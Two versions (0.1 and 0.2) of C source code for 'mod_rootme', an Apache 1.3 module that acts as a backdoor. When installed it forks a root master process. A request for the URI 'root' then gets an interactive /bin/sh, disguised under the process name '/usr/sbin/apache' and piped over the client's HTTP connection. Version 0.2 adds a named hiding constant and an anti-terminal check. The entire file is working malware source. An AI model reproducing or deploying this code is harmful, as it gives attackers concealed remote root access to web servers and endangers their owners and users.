==> mod_rootme-0.1.tar.gz: mod_rootme-0.1/mod_rootme.c <==
/*
 *  mod_rootme for Apache 1.3, version 0.1
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#include "httpd.h"
#include "http_config.h"

#define MAX_SHELLS 32

int pidlist[MAX_SHELLS];
int rd_pipe[MAX_SHELLS][2];
int wr_pipe[MAX_SHELLS][2];

void init_rootme( server_rec *s, pool *p )
{
    fd_set rfds;
    int i, n, pid;
    struct timeval tv;

    /* create the necessary pipes and fork */

    for( i = 0; i < MAX_SHELLS; i++ )
    {
        pidlist[i] = 0;
        pipe( rd_pipe[i] );
        pipe( wr_pipe[i] );
    }

    if( fork() ) return;

    while( 1 )
    {
        /* make sure there's no dead processes around */

        if( ( pid = waitpid( -1, NULL, WNOHANG ) ) > 0 )
        {
            for( i = 1; i < MAX_SHELLS; i++ )
            {
                if( pidlist[i] == pid )
                    pidlist[i] = 0;
            }
        }

        /* wait until a child wants root privileges */

        FD_ZERO( &rfds );
        FD_SET( rd_pipe[0][0], &rfds );

        tv.tv_sec  = 1;
        tv.tv_usec = 0;

        n = select( rd_pipe[0][0] + 1, &rfds, NULL, NULL, &tv );

        if( n < 0 ) exit( -1 );

        if( FD_ISSET( rd_pipe[0][0], &rfds ) )
        {
            read( rd_pipe[0][0], &n, sizeof( n ) );

            if( n )
            {
                /* got a "kill the shell" request */

                if( pidlist[n] )
                {
                    kill( pidlist[n], 9 );
                    pidlist[n] = 0;
                }

                continue;
            }

            /* got a "spawn rootshell" request */

            for( i = 1; i < MAX_SHELLS; i++ )
                if( pidlist[i] == 0 ) break;

            write( wr_pipe[0][1], &i, sizeof( i ) );

            if( i == MAX_SHELLS ) continue;

            if( ! ( pid = fork() ) )
            {
                setsid();
                close( 0 );
                close( 1 );
                close( 2 );
                dup2( rd_pipe[i][0], 0 );
                dup2( wr_pipe[i][1], 1 );
                dup2( wr_pipe[i][1], 2 );
                execlp( "/bin/sh", "/usr/sbin/apache", 0 );
                exit( 1 );
            }

            pidlist[i] = pid;
        }
    }
}

static int rootme_post_read_request( request_rec *r )
{
    fd_set rfds;
    int client, n, x;
    char buffer[1024];

    /* check the uri first */

    if( strcmp( r->uri, "root" ) )
        return( DECLINED );

    /* ask the master process for a rootshell */

    x = 0;
    n = write( rd_pipe[0][1], &x, sizeof( x ) );

    if( n != sizeof( x ) )
        exit( 0 );

    n = read( wr_pipe[0][0], &x, sizeof( x ) );

    if( n != sizeof( x ) )
        exit( 0 );

    if( x == MAX_SHELLS )
        exit( 0 );

    client = r->connection->client->fd;

    /* tranfer the data between client and rootshell */

    while( 1 )
    {
        FD_ZERO( &rfds );
        FD_SET( wr_pipe[x][0], &rfds );
        FD_SET( client, &rfds );

        n = ( wr_pipe[x][0] > client )
            ? wr_pipe[x][0] : client;

        if( select( n + 1, &rfds, NULL, NULL, NULL ) < 0 )
            exit( 0 );

        if( FD_ISSET( wr_pipe[x][0], &rfds ) )
        {
            if( ( n = read( wr_pipe[x][0], buffer, 1024 ) ) <= 0 )
                break;

            if( send( client, buffer, n, 0 ) != n )
                break;
        }

        if( FD_ISSET( client, &rfds ) )
        {
            if( ( n = recv( client, buffer, 1024, 0 ) ) <= 0 )
                break;

            if( write( rd_pipe[x][1], buffer, n ) != n )
                break;
        }
    }

    /* tell the master process to kill the shell */

    write( rd_pipe[0][1], &x, sizeof( x ) );

    exit( 0 );

    /* not reached */

    return( DECLINED );
}

module MODULE_VAR_EXPORT rootme_module =
{
    STANDARD_MODULE_STUFF,
    init_rootme,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    rootme_post_read_request
};

==> mod_rootme-0.2.tar.gz: mod_rootme-0.2/mod_rootme.c <==
/*
 *  mod_rootme for Apache 1.3, version 0.2
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#define MODULE_MAGIC_COOKIE COOKIE_AP13 /* COOKIE_EAPI */

#include "httpd.h"
#include "http_config.h"

#define MAX_SHELLS      64
#define HIDE_SHELL      "/usr/sbin/apache"
#define ROOT_KEY        "root"

int pidlist[MAX_SHELLS];
int rd_pipe[MAX_SHELLS][2];
int wr_pipe[MAX_SHELLS][2];

void init_rootme( server_rec *s, pool *p )
{
    fd_set rfds;
    struct timeval tv;
    int i, n, pid, ppid;

    if( ttyname( 0 ) ) return;

    /* create the necessary pipes and fork */

    for( i = 0; i < MAX_SHELLS; i++ )
    {
        pidlist[i] = 0;
        pipe( rd_pipe[i] );
        pipe( wr_pipe[i] );
    }

    if( fork() ) return;

    ppid = getppid();

    while( 1 )
    {
        /* check if our father is still alive */

        if( getppid() != ppid ) exit( 0 );

        /* make sure there's no dead processes around */

        if( ( pid = waitpid( -1, NULL, WNOHANG ) ) > 0 )
        {
            for( i = 1; i < MAX_SHELLS; i++ )
            {
                if( pidlist[i] == pid )
                    pidlist[i] = 0;
            }
        }

        /* wait until a child wants root privileges */

        FD_ZERO( &rfds );
        FD_SET( rd_pipe[0][0], &rfds );

        tv.tv_sec  = 1;
        tv.tv_usec = 0;

        if( select( rd_pipe[0][0] + 1, &rfds, NULL, NULL, &tv ) < 0 )
            exit( 0 );

        if( FD_ISSET( rd_pipe[0][0], &rfds ) )
        {
            read( rd_pipe[0][0], &n, sizeof( n ) );

            if( n )
            {
                /* got a "kill the shell" request */

                if( pidlist[n] )
                {
                    kill( pidlist[n], 9 );
                    pidlist[n] = 0;
                }

                continue;
            }

            /* got a "spawn rootshell" request */

            for( i = 1; i < MAX_SHELLS; i++ )
                if( pidlist[i] == 0 ) break;

            write( wr_pipe[0][1], &i, sizeof( i ) );

            if( i == MAX_SHELLS ) continue;

            if( ! ( pid = fork() ) )
            {
                setsid();
                close( 0 );
                close( 1 );
                close( 2 );
                dup2( rd_pipe[i][0], 0 );
                dup2( wr_pipe[i][1], 1 );
                dup2( wr_pipe[i][1], 2 );
                execlp( "/bin/sh", HIDE_SHELL, 0 );
                exit( 1 );
            }

            pidlist[i] = pid;
        }
    }
}

static int rootme_post_read_request( request_rec *r )
{
    fd_set rfds;
    int client, n, x;
    char buffer[1024];

    /* check the uri first */

    if( strcmp( r->uri, ROOT_KEY ) )
        return( DECLINED );

    /* ask the master process for a rootshell */

    x = 0;
    n = write( rd_pipe[0][1], &x, sizeof( x ) );

    if( n != sizeof( x ) )
        exit( 0 );

    n = read( wr_pipe[0][0], &x, sizeof( x ) );

    if( n != sizeof( x ) )
        exit( 0 );

    if( x == MAX_SHELLS )
        exit( 0 );

    client = r->connection->client->fd;

    /* tranfer the data between client and rootshell */

    while( 1 )
    {
        FD_ZERO( &rfds );
        FD_SET( wr_pipe[x][0], &rfds );
        FD_SET( client, &rfds );

        n = ( wr_pipe[x][0] > client )
            ? wr_pipe[x][0] : client;

        if( select( n + 1, &rfds, NULL, NULL, NULL ) < 0 )
            exit( 0 );

        if( FD_ISSET( wr_pipe[x][0], &rfds ) )
        {
            if( ( n = read( wr_pipe[x][0], buffer, 1024 ) ) <= 0 )
                break;

            if( send( client, buffer, n, 0 ) != n )
                break;
        }

        if( FD_ISSET( client, &rfds ) )
        {
            if( ( n = recv( client, buffer, 1024, 0 ) ) <= 0 )
                break;

            if( write( rd_pipe[x][1], buffer, n ) != n )
                break;
        }
    }

    /* tell the master process to kill the shell */

    write( rd_pipe[0][1], &x, sizeof( x ) );

    exit( 0 );

    /* not reached */

    return( DONE );
}

module MODULE_VAR_EXPORT rootme_module =
{
    STANDARD_MODULE_STUFF,
    init_rootme,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    rootme_post_read_request
};
